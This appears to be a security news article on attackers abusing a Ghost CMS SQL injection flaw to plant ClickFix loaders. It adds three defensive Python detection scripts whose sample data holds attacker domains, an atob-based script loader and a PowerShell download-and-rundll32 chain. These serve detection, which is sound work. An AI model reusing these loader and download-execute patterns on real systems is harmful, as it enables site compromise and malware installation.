Threat actors are actively exploiting a critical security vulnerability within the Ghost Content Management System (CMS), leveraging it to inject malicious JavaScript code and facilitate ClickFix attacks. This recent surge in malicious activity targets users of the popular open-source blogging platform, highlighting the persistent threat of web security compromises.
The exploitation centers around CVE-2026-26980, an SQL injection flaw in Ghost’s Content API that carries a CVSS score of 9.4. This severe vulnerability, patched in version 6.19.1 in February 2026, allows unauthenticated attackers to access sensitive database information. Discovered by Anthropic researchers using their AI model Claude, the flaw’s true danger lies in its ability to grant unauthorized access to a site’s Admin API key.
Ghost CMS Vulnerability Fuels Widespread ClickFix Attacks
The compromised Admin API key provides attackers with the capability to directly modify published articles and inject harmful code, as detailed by security vendor QiAnXin XLab. In a significant “poisoning” campaign, threat actors have been observed obtaining these keys without permission and subsequently using the Ghost Admin API to perform bulk article tampering. Malicious JavaScript loaders are being inserted at the footer of web pages to support what are known as ClickFix attacks.
This campaign appears to involve at least two distinct threat clusters. Security researchers first detected the malicious activity on May 7, 2026. The attacks have already impacted over 700 websites across diverse sectors, including higher education, blockchain technology, artificial intelligence, software-as-a-service (SaaS), security research, media, and financial technology. Because the injected code is served from legitimate, trusted websites, the ClickFix lure that follows is more likely to succeed than one hosted on attacker infrastructure.
The injected JavaScript functions as a two-stage loader. Its primary role is to fetch the main payload from an external domain, specifically “clo4shara[.]xyz/11z77u3.php,” at runtime. This modular architecture allows attackers to easily swap payloads across different compromised sites while maintaining the loader’s core functionality.
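For site owners who need to find out whether their own articles were tampered with, the following Python script is an added example (not XLab's tooling or Ghost's own code) that scans the posts in a Ghost JSON export for script tags that do not belong. It matches external script hosts against the two domains named in this article, flags any other third-party script host not on an allow-list, and applies a heuristic for inline scripts that build a script element from a decoded string, which is the shape of a staged loader. The export layout (db[0].data.posts) and the per-post codeinjection_foot / codeinjection_head field names are assumptions based on Ghost exports; the sample export and the site host blog.example.com are constructed for the demonstration.

```python
import json
from html.parser import HTMLParser
from urllib.parse import urlparse

# Script hosts named in the XLab reporting summarised above (shown defanged
# there; written plainly here so they match real markup).
KNOWN_BAD_DOMAINS = {"clo4shara.xyz", "web-telegram.ug"}


class ScriptCollector(HTMLParser):
    """Gather external <script src> targets and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._buf = None

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._buf = []          # start collecting an inline script body

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None


def scan_posts(posts, site_host, allowed_hosts=()):
    """Return (slug, field, reason, evidence) tuples for scripts that do not belong."""
    allowed = {site_host.lower(), *(h.lower() for h in allowed_hosts)}
    findings = []
    for post in posts:
        slug = post.get("slug", "?")
        # Rendered article HTML lives in "html"; per-post footer/header snippets in
        # codeinjection_foot / codeinjection_head (field names assumed from Ghost
        # exports; verify against your own export).
        for field in ("html", "codeinjection_foot", "codeinjection_head"):
            fragment = post.get(field) or ""
            if not fragment:
                continue
            c = ScriptCollector()
            c.feed(fragment)
            for src in c.external:
                host = (urlparse(src).hostname or "").lower()   # "" for relative paths
                if host in KNOWN_BAD_DOMAINS:
                    findings.append((slug, field, "known-bad script host", src))
                elif host and host not in allowed:
                    findings.append((slug, field, "unexpected third-party script", src))
            for body in c.inline:
                low = body.lower()
                if any(d in low for d in KNOWN_BAD_DOMAINS):
                    findings.append((slug, field, "known-bad domain in inline script", body.strip()[:80]))
                elif "createelement" in low and ("atob(" in low or "fromcharcode" in low):
                    # Heuristic: a script element assembled at runtime from a decoded
                    # string is how a staged loader typically fetches its next stage.
                    findings.append((slug, field, "obfuscated loader pattern (heuristic)", body.strip()[:80]))
    return findings


def load_posts_from_export(export):
    """Pull the posts array out of a Ghost JSON export (db[0].data.posts; assumed layout)."""
    return export["db"][0]["data"]["posts"]


# Constructed sample export: a clean post with one third-party analytics script,
# a post carrying a known-bad footer script, and a post whose per-post code
# injection builds a script element at runtime.
SAMPLE_EXPORT = {"db": [{"data": {"posts": [
    {"slug": "welcome",
     "html": '<p>Hello</p><script src="/assets/js/app.js"></script>'
             '<script src="https://cdn.example-analytics.net/a.js"></script>'},
    {"slug": "q1-roadmap",
     "html": '<p>Plans</p><script src="https://clo4shara.xyz/11z77u3.php"></script>'},
    {"slug": "about",
     "html": "<p>About</p>",
     "codeinjection_foot": "<script>var s=document.createElement('script');"
                           "s.src=atob(payload);document.body.appendChild(s);</script>"},
]}}]}

if __name__ == "__main__":
    import sys
    export = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_EXPORT
    for finding in scan_posts(load_posts_from_export(export), "blog.example.com"):
        print(*finding, sep=" | ")
```

Run it against a fresh export of the suspected site; anything reported as a known-bad host is a confirmed indicator, while the third-party and heuristic findings need a human to confirm against the scripts the site legitimately uses (pass those hosts via allowed_hosts). Ghost's site-wide code injection settings are stored separately from posts and should be reviewed by the same criteria.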
Attack Chain and Payload Delivery
According to XLab, direct access to “clo4shara[.]xyz/11z77u3.php” reveals a traffic distribution script. This script collects browser fingerprinting information from visitors and uploads it to the server. Based on instructions received back from the server, the script then initiates actions such as redirection, pop-up windows, or file downloads. This PHP script is reportedly powered by Adspect, a commercial cloaking service designed to hide malicious activity from security scanners and crawlers.
The cloaking script ensures that only real visitors who match the targeting criteria receive the malicious payload, while automated tools such as scanners and crawlers are served a seemingly benign page. The script supports 19 different commands, giving the operator the ability to execute arbitrary JavaScript and remotely control the victim’s browser.
Users identified as targets are presented with a fake CAPTCHA verification page within an iframe. To proceed, they are instructed to copy and paste a Base64-encoded command into the Windows Run dialog. This command acts as a dropper, initiating the download and extraction of a ZIP archive. This archive contains a Windows batch script which, in turn, executes a PowerShell command to download a DLL file from a remote domain.
The DLL is then launched using “rundll32.exe,” and a deceptive webpage is opened to distract the user. In some observed instances, subsequent iterations of the malware have replaced the DLL with a JavaScript payload. Regardless of the delivery method, the ultimate objective is to install a Windows executable. In the case of the DLL, this executable is a PuTTY client with a valid code-signing certificate. When delivered via JavaScript, the payload is an Inno Setup installer for an Electron application.
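The execution chain just described (a command pasted into the Run dialog, a batch script, a PowerShell download, then rundll32 loading a DLL) leaves a recognisable process lineage in endpoint telemetry. The following Python script is an added example, not part of this article or XLab's analysis, that correlates constructed process-creation records in the style of a Sysmon Event ID 1 export: it looks for rundll32 loading a DLL from a user-writable path and walks the parent chain back to a process launched by explorer.exe (the Run dialog's parent) with a Base64-looking token or an encoded-command flag on its command line. Field names (pid, ppid, image, cmdline), the sample events, and the placeholder Base64 string are all constructed for the demonstration.

```python
import base64
import ntpath
import re

# Paths a standard user can write to; a DLL loaded from one of these by rundll32
# deserves scrutiny.
USER_WRITABLE = re.compile(
    r"\\(?:Users\\[^\\]+\\(?:AppData|Downloads|Desktop|Documents)|Temp|ProgramData)\\", re.I)
# A long Base64-looking token, or PowerShell's -EncodedCommand and its accepted prefixes.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/=])[A-Za-z0-9+/]{40,}={0,2}(?![A-Za-z0-9+/=])")
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\b", re.I)


def _name(image):
    return ntpath.basename(image).lower()


def is_run_dialog_launch(ev, by_pid):
    """Child of explorer.exe carrying an encoded command line (Run dialog shape)."""
    parent = by_pid.get(ev["ppid"])
    if not parent or _name(parent["image"]) != "explorer.exe":
        return False
    return bool(ENC_FLAG.search(ev["cmdline"]) or B64_TOKEN.search(ev["cmdline"]))


def is_suspicious_rundll32(ev):
    return _name(ev["image"]) == "rundll32.exe" and bool(USER_WRITABLE.search(ev["cmdline"]))


def detect_clickfix_chains(events):
    """Return one alert per suspicious rundll32 launch, with its process lineage."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for ev in events:
        if not is_suspicious_rundll32(ev):
            continue
        chain, seen = [ev], {ev["pid"]}
        cur = by_pid.get(ev["ppid"])
        while cur and cur["pid"] not in seen:          # walk up to the root we know about
            chain.append(cur)
            seen.add(cur["pid"])
            cur = by_pid.get(cur["ppid"])
        origin = next((e for e in chain if is_run_dialog_launch(e, by_pid)), None)
        alerts.append({
            "rundll32_pid": ev["pid"],
            "dll_cmdline": ev["cmdline"],
            "run_dialog_pid": origin["pid"] if origin else None,
            # Lineage back to an encoded Run-dialog launch is the full ClickFix
            # shape; a lone rundll32 from a user path is only a weak signal.
            "confidence": "high" if origin else "low",
            "lineage": [e["pid"] for e in reversed(chain)],
        })
    return alerts


# Constructed placeholder token: Base64 of a harmless string, only so the
# sample command line has the length and alphabet of an encoded command.
RUN_DIALOG_B64 = base64.b64encode(
    "constructed placeholder, not a real dropper".encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 900, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 5208, "ppid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -w hidden -enc {RUN_DIALOG_B64}"},
    {"pid": 6001, "ppid": 5208, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\Users\alice\AppData\Local\Temp\upd\run.bat"},
    {"pid": 6044, "ppid": 6001, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -NoProfile -Command "Invoke-WebRequest https://example.invalid/x '
                r'-OutFile C:\Users\alice\AppData\Local\Temp\upd\x.dll"'},
    {"pid": 6100, "ppid": 6044, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\upd\x.dll,#1"},
    # Benign noise: a document opened from explorer and a system rundll32 call.
    {"pid": 7000, "ppid": 4120, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\alice\Documents\notes.txt"},
    {"pid": 7100, "ppid": 800, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    # A rundll32 from a user path whose parent is not in the captured events.
    {"pid": 7200, "ppid": 7150, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\bob\Downloads\helper.dll,Init"},
]

if __name__ == "__main__":
    for alert in detect_clickfix_chains(SAMPLE_EVENTS):
        print(alert)
```

The lineage walk stops at the first parent that is missing from the events, so the "low" confidence result is the expected outcome when telemetry is incomplete; tune the path list and the Base64 length threshold to your environment before relying on the "high" verdict.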
This Electron application is a modified version of the open-source Grape desktop client. Its design focuses on establishing persistence and periodically polling a remote server, identified as “web-telegram[.]ug,” every 30 seconds. This allows attackers to issue instructions, including the execution of JavaScript code or other executable files.
To mitigate these risks, Ghost CMS users are strongly advised to upgrade their installations to the latest version. Additionally, rotating all access credentials, thoroughly cleaning compromised websites, and auditing access logs for any suspicious activity are crucial steps. Organizations should also consider notifying users who may have visited affected sites during the contamination period about the potential risk of compromise.
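One concrete way to perform the access-log audit recommended above is to look for the bulk tampering pattern itself: many successful edits to the Admin API's post endpoint from one client in a short window. The Python script below is an added example (not Ghost's code or XLab's) that parses combined-format web server log lines, counts successful PUT requests to the post-edit route per client IP with a sliding time window, and reports clients that exceed a threshold together with the user agents they used. The route pattern (/ghost/api/admin/posts/{id}/, with an optional version prefix on older releases) is as understood from Ghost's API and should be checked against the installed version; the log lines are constructed, using documentation address ranges.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# nginx/Apache "combined" access-log line (the format assumed here).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# Admin API post-edit route: PUT /ghost/api/admin/posts/{id}/ (older releases
# carry a version segment such as /ghost/api/v3/admin/). Route assumed from
# Ghost's API docs; the listing route /ghost/api/admin/posts/ does not match.
ADMIN_POST_EDIT = re.compile(r"^/ghost/api/(?:v\d+/)?admin/posts/[^/?]+/?(?:\?|$)")


def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def find_bulk_edits(log_lines, window=timedelta(minutes=5), threshold=5):
    """Flag client IPs with >= threshold successful post edits inside any `window`."""
    edits = defaultdict(list)
    agents = defaultdict(set)
    for line in log_lines:
        rec = parse_line(line)
        if (rec and rec["method"] == "PUT" and rec["status"].startswith("2")
                and ADMIN_POST_EDIT.match(rec["path"])):
            edits[rec["ip"]].append(rec["ts"])
            agents[rec["ip"]].add(rec["ua"])
    alerts = []
    for ip, times in edits.items():
        times.sort()
        best, j = 0, 0
        for i, t in enumerate(times):            # sliding window over sorted timestamps
            while times[j] < t - window:
                j += 1
            best = max(best, i - j + 1)
        if best >= threshold:
            alerts.append({"ip": ip, "edits_in_window": best, "total_edits": len(times),
                           "first": times[0].isoformat(), "last": times[-1].isoformat(),
                           "user_agents": sorted(agents[ip])})
    return alerts


# Constructed sample log: a normal Content API read, then one client listing
# every post and rewriting six of them in under 15 seconds, then a single edit
# by an editor through the browser hours later.
SAMPLE_LOG = """\
198.51.100.23 - - [07/May/2026:02:58:40 +0000] "GET /ghost/api/content/posts/?key=0123456789abcdef01234567 HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
203.0.113.7 - - [07/May/2026:03:13:58 +0000] "GET /ghost/api/admin/posts/?limit=all HTTP/1.1" 200 55120 "-" "python-requests/2.31.0"
203.0.113.7 - - [07/May/2026:03:14:07 +0000] "PUT /ghost/api/admin/posts/6639f2b1c4a5e70012345678/ HTTP/1.1" 200 1532 "-" "python-requests/2.31.0"
203.0.113.7 - - [07/May/2026:03:14:09 +0000] "PUT /ghost/api/admin/posts/6639f2b1c4a5e70012345679/ HTTP/1.1" 200 1490 "-" "python-requests/2.31.0"
203.0.113.7 - - [07/May/2026:03:14:12 +0000] "PUT /ghost/api/admin/posts/6639f2b1c4a5e7001234567a/ HTTP/1.1" 200 1602 "-" "python-requests/2.31.0"
203.0.113.7 - - [07/May/2026:03:14:15 +0000] "PUT /ghost/api/admin/posts/6639f2b1c4a5e7001234567b/ HTTP/1.1" 200 1388 "-" "python-requests/2.31.0"
203.0.113.7 - - [07/May/2026:03:14:18 +0000] "PUT /ghost/api/admin/posts/6639f2b1c4a5e7001234567c/ HTTP/1.1" 200 1511 "-" "python-requests/2.31.0"
203.0.113.7 - - [07/May/2026:03:14:21 +0000] "PUT /ghost/api/admin/posts/6639f2b1c4a5e7001234567d/ HTTP/1.1" 200 1477 "-" "python-requests/2.31.0"
198.51.100.4 - - [07/May/2026:09:02:11 +0000] "PUT /ghost/api/admin/posts/6639f2b1c4a5e7001234aaaa/ HTTP/1.1" 200 1490 "https://blog.example.com/ghost/" "Mozilla/5.0"
"""

if __name__ == "__main__":
    import sys
    lines = open(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LOG.splitlines()
    for alert in find_bulk_edits(lines):
        print(alert)
```

A burst from a scripted client is the strongest signal, but the same IP's earlier listing request and its first appearance in the log are what bound the contamination window; that window, not just the patch date, is what decides which visitors to notify and which posts to restore from a known-good backup.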
The ongoing exploitation of the Ghost CMS vulnerability highlights the importance of timely patching and robust security practices for all web platforms. The future trajectory of this campaign will likely depend on the attackers’ ability to adapt their payload delivery mechanisms and maintain access to their command-and-control infrastructure, while defenders work to identify and remediate further compromises.